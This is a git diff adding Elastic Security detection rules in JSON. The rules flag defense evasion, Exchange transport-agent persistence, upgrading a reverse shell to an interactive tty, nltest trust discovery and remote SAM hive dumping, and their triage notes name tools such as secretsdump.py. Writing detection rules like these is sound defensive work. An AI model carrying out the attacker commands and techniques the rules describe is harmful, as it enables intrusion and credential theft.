If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "83e9c2b3-24ef-4c1d-a8cd-5ebafb5dfa2f_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_3.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_3.json new file mode 100644 index 00000000000..74cc36f4b72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_3.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Microsoft Exchange Transport Agents install. Adversaries may leverage malicious Microsoft Exchange Transport Agents to execute tasks in response to adversary-defined criteria, establishing persistence.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Exchange Transport Agent Install Script", + "query": "event.category: \"process\" and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Install-TransportAgent\" or\n \"Enable-TransportAgent\"\n )\n ) and\n not user.id : \"S-1-5-18\" and\n not powershell.file.script_block_text : (\n \"'Install-TransportAgent', 'Invoke-MonitoringProbe', 'Mount-Database', 'Move-ActiveMailboxDatabase',\" or\n \"'Enable-TransportAgent', 'Enable-TransportRule', 'Export-ActiveSyncLog', 'Export-AutoDiscoverConfig',\" or\n (\"scriptCmd.GetSteppablePipeline\" and \"ForwardHelpTargetName Install-TransportAgent\")\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", + "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to implement the logging 
policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.002", + "name": "Transport Agent", + "reference": "https://attack.mitre.org/techniques/T1505/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 3 + }, + "id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_4.json b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_4.json new file mode 100644 index 00000000000..94d22156ad0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/846fe13f-6772-4c83-bd39-9d16d4ad1a81_4.json 
@@ -0,0 +1,110 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to Microsoft Exchange Transport Agents install. Adversaries may leverage malicious Microsoft Exchange Transport Agents to execute tasks in response to adversary-defined criteria, establishing persistence.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Exchange Transport Agent Install Script", + "query": "event.category: \"process\" and host.os.type:windows and\n powershell.file.script_block_text : (\n (\n \"Install-TransportAgent\" or\n \"Enable-TransportAgent\"\n )\n ) and\n not user.id : \"S-1-5-18\" and\n not powershell.file.script_block_text : (\n \"'Install-TransportAgent', 'Invoke-MonitoringProbe', 'Mount-Database', 'Move-ActiveMailboxDatabase',\" or\n \"'Enable-TransportAgent', 'Enable-TransportRule', 'Export-ActiveSyncLog', 'Export-AutoDiscoverConfig',\" or\n (\"scriptCmd.GetSteppablePipeline\" and \"ForwardHelpTargetName Install-TransportAgent\")\n )\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\nSteps to 
implement the logging policy via registry:\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.002", + "name": "Transport Agent", + "reference": "https://attack.mitre.org/techniques/T1505/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "846fe13f-6772-4c83-bd39-9d16d4ad1a81_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_3.json b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_3.json new file mode 100644 index 00000000000..774be85bac6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/84d1f8db-207f-45ab-a578-921d91c23eb2_3.json 
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Upgrade of Non-interactive Shell", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and (\n (process.name == \"stty\" and process.args == \"raw\" and process.args == \"-echo\" and process.args_count >= 3) or\n (process.name == \"script\" and process.args in (\"-qc\", \"-c\") and process.args == \"/dev/null\" and \n process.args_count == 4)\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "84d1f8db-207f-45ab-a578-921d91c23eb2", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "84d1f8db-207f-45ab-a578-921d91c23eb2_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_110.json b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_110.json new file mode 100644 index 00000000000..8c61dff5106 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/84da2554-e12a-11ec-b896-f661ea17fbcd_110.json 
@@ -0,0 +1,113 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of nltest.exe for domain trust discovery purposes. Adversaries may use this command-line utility to enumerate domain trusts and gain insight into trust relationships, as well as the state of Domain Controller (DC) replication in a Microsoft Windows NT Domain.", + "false_positives": [ + "Domain administrators may use this command-line utility for legitimate information gathering purposes, but it is not common for environments with Windows Server 2012 and newer." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumerating Domain Trusts via NLTEST.EXE", + "note": "## Triage and analysis\n\n### Investigating Enumerating Domain Trusts via NLTEST.EXE\n\nActive Directory (AD) domain trusts define relationships between domains within a Windows AD environment. In this setup, a \"trusting\" domain permits users from a \"trusted\" domain to access resources. These trust relationships can be configurable as one-way, two-way, transitive, or non-transitive, enabling controlled access and resource sharing across domains.\n\nThis rule identifies the usage of the `nltest.exe` utility to enumerate domain trusts. Attackers can use this information to enable the next actions in a target environment, such as lateral movement.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation and are done within the user business context (e.g., an administrator in this context). As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- Enumerating Domain Trusts via DSQUERY.EXE - 06a7a03c-c735-47a6-a313-51c354aef6c3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"nltest.exe\" and process.args : (\n \"/DCLIST:*\", \"/DCNAME:*\", \"/DSGET*\",\n \"/LSAQUERYFTI:*\", \"/PARENTDOMAIN\",\n \"/DOMAIN_TRUSTS\", \"/BDC_QUERY:*\"\n ) and \nnot process.parent.name : \"PDQInventoryScanner.exe\" and \nnot user.id in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + 
}, + "technique": [ + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + }, + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "84da2554-e12a-11ec-b896-f661ea17fbcd_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_110.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_110.json new file mode 100644 index 00000000000..9a404282fa2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_110.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote access to the registry to potentially dump credential data from the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Credential Access via Registry", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "references": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + 
"name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", + "setup": "## Setup\n\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote 
Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "850d901a-2a3c-46c6-8b22-55398a01aad8_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_111.json b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_111.json new file mode 100644 index 00000000000..38b8537b6ff --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/850d901a-2a3c-46c6-8b22-55398a01aad8_111.json 
@@ -0,0 +1,121 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote access to the registry to potentially dump credential data from the Security Account Manager (SAM) registry hive in preparation for credential access and privileges elevation.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Credential Access via Registry", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Credential Access via Registry\n\nDumping registry hives is a common way to access credential information. Some hives store credential material, such as the SAM hive, which stores locally cached credentials (SAM secrets), and the SECURITY hive, which stores domain cached credentials (LSA secrets). Dumping these hives in combination with the SYSTEM hive enables the attacker to decrypt these secrets.\n\nAttackers can use tools like secretsdump.py or CrackMapExec to dump the registry hives remotely, and use dumped credentials to access other systems in the domain.\n\n#### Possible investigation steps\n\n- Identify the specifics of the involved assets, such as their role, criticality, and associated users.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Determine the privileges of the compromised accounts.\n- Investigate other alerts associated with the user/source host during the past 48 hours.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (e.g., 4624) to the target host.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Related rules\n\n- Credential Acquisition via Registry Hive Dumping - a7e7bfa3-088e-4f13-b29e-3986e0e756b8\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine if other hosts were compromised.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Ensure that the machine has the latest security updates and is not running unsupported Windows versions.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and\n event.action == \"creation\" and process.name : \"svchost.exe\" and\n file.Ext.header_bytes : \"72656766*\" and user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and file.size >= 30000 and\n file.path : (\"?:\\\\Windows\\\\system32\\\\*.tmp\", \"?:\\\\WINDOWS\\\\Temp\\\\*.tmp\")\n", + "references": [ + "https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + 
"name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "850d901a-2a3c-46c6-8b22-55398a01aad8", + "setup": "## Setup\n\nThis rule uses Elastic Endpoint file creation and system integration events for correlation. Both data should be collected from the host for this detection to work.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.002", + "name": "Security Account Manager", + "reference": "https://attack.mitre.org/techniques/T1003/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote 
Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "850d901a-2a3c-46c6-8b22-55398a01aad8_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_210.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_210.json new file mode 100644 index 00000000000..a3b63249a53 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_210.json 
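Review bot: The `setup` text in this file says the rule correlates Elastic Endpoint file creation events with system integration events and that both must be collected, but `index` holds only `logs-endpoint.events.file-*`, `related_integrations` declares only the `endpoint` package, and `query` is a single `file where …` expression with no cross-source correlation, so the stated prerequisite is neither enforced nor surfaced to the operator in Kibana. If the system-integration dependency is real, add the `system` entry used elsewhere on this page (`{"package": "system", "version": "^1.6.4"}`) to `related_integrations`; if it is a leftover from an earlier revision, reword the opening setup sentence to `This rule uses Elastic Endpoint file creation events; Elastic Defend must be collecting file events from the host for this detection to work.` The same sentence appears in the `_110` revision above, whose hunk starts before this chunk.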
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Suspicious PowerShell Engine ImageLoad", + "new_terms_fields": [ + "host.id", + "process.executable", + "user.id" + ], + "note": "## Triage and analysis\n\n### Investigating Suspicious PowerShell Engine ImageLoad\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called \"PowerShell without PowerShell,\" works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe.\n- Retrieve the implementation (DLL, executable, etc.) 
